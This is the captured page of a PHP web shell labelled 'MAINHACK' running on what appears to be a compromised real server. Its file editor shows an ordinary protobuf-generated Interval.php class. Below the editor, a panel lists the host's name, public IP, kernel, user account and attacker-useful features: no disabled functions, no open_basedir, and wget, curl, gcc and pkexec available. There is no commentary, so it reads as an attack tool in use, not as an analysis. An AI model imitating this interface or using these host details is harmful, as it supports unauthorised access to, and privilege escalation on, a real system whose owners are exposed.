[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Interval.php
<?php # Generated by the protocol buffer compiler. DO NOT EDIT! # source: google/type/interval.proto namespace Google\Type; use Google\Protobuf\Internal\GPBType; use Google\Protobuf\Internal\RepeatedField; use Google\Protobuf\Internal\GPBUtil; /** * Represents a time interval, encoded as a Timestamp start (inclusive) and a * Timestamp end (exclusive). * The start must be less than or equal to the end. * When the start equals the end, the interval is empty (matches no time). * When both start and end are unspecified, the interval matches any time. * * Generated from protobuf message <code>google.type.Interval</code> */ class Interval extends \Google\Protobuf\Internal\Message { /** * Optional. Inclusive start of the interval. * If specified, a Timestamp matching this interval will have to be the same * or after the start. * * Generated from protobuf field <code>.google.protobuf.Timestamp start_time = 1;</code> */ protected $start_time = null; /** * Optional. Exclusive end of the interval. * If specified, a Timestamp matching this interval will have to be before the * end. * * Generated from protobuf field <code>.google.protobuf.Timestamp end_time = 2;</code> */ protected $end_time = null; /** * Constructor. * * @param array $data { * Optional. Data for populating the Message object. * * @type \Google\Protobuf\Timestamp $start_time * Optional. Inclusive start of the interval. * If specified, a Timestamp matching this interval will have to be the same * or after the start. * @type \Google\Protobuf\Timestamp $end_time * Optional. Exclusive end of the interval. * If specified, a Timestamp matching this interval will have to be before the * end. * } */ public function __construct($data = NULL) { \GPBMetadata\Google\Type\Interval::initOnce(); parent::__construct($data); } /** * Optional. Inclusive start of the interval. * If specified, a Timestamp matching this interval will have to be the same * or after the start. * * Generated from protobuf field <code>.google.protobuf.Timestamp start_time = 1;</code> * @return \Google\Protobuf\Timestamp|null */ public function getStartTime() { return $this->start_time; } public function hasStartTime() { return isset($this->start_time); } public function clearStartTime() { unset($this->start_time); } /** * Optional. Inclusive start of the interval. * If specified, a Timestamp matching this interval will have to be the same * or after the start. * * Generated from protobuf field <code>.google.protobuf.Timestamp start_time = 1;</code> * @param \Google\Protobuf\Timestamp $var * @return $this */ public function setStartTime($var) { GPBUtil::checkMessage($var, \Google\Protobuf\Timestamp::class); $this->start_time = $var; return $this; } /** * Optional. Exclusive end of the interval. * If specified, a Timestamp matching this interval will have to be before the * end. * * Generated from protobuf field <code>.google.protobuf.Timestamp end_time = 2;</code> * @return \Google\Protobuf\Timestamp|null */ public function getEndTime() { return $this->end_time; } public function hasEndTime() { return isset($this->end_time); } public function clearEndTime() { unset($this->end_time); } /** * Optional. Exclusive end of the interval. * If specified, a Timestamp matching this interval will have to be before the * end. * * Generated from protobuf field <code>.google.protobuf.Timestamp end_time = 2;</code> * @param \Google\Protobuf\Timestamp $var * @return $this */ public function setEndTime($var) { GPBUtil::checkMessage($var, \Google\Protobuf\Timestamp::class); $this->end_time = $var; return $this; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.62 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002